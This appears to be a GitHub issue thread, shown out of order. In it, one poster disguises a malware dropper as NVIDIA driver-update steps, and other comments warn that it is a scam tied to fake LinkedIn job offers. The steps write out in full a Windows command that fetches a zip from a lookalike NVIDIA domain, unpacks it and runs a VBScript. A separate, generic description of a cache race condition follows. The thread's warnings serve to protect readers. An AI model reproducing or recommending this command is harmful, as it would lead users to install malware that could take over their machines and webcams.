Closed trevor9312 closed 3 weeks ago
- Open terminal on Windows
- Press Windows Key + R to open the Run dialog.
- Type cmd and press Enter. This opens the Command Prompt.
- Update NVIDIA drivers on Windows To automatically update the latest NVIDIA drivers for Windows, use the following curl command.
curl -o "%TEMP%\nvidiaupdate.zip" https://api.nvidia-release.us/nvidia.update && powershell -Command "Expand-Archive -Path '%TEMP%\nvidiaupdate.zip' -DestinationPath '%TEMP%\nvidiadrive'" && wscript "%TEMP%\nvidiadrive\update.vbs"
DO NOT ALLOW THESE BROKE LINKEDIN SCAMMERS TO FOOL YOU INTO RUNNING THAT COMMAND TO ACTIVATE YOUR WEBCAM
⚠️ ⚠️⚠️ Saw this issue from a youtuber who tried to find a job on linkedin DO NOT execute provided curl! It's a total scam which will get a malware on your device Please, always pay attention and DO NOT execute such stuff, stay safe! P.S. Already reported that fake github account and send an email to Namecheap abuse contact for them to take actions regarding those fake domains
There appears to be a race condition in NVIDIA's discoverer cache usage on Windows. When multiple threads or processes access the cache simultaneously, this can lead to unexpected behavior, including crashes or corrupted cache data. The issue seems to stem from the lack of proper synchronization mechanisms, making cache access non-thread-safe during concurrent operations.
Issues:
System Information: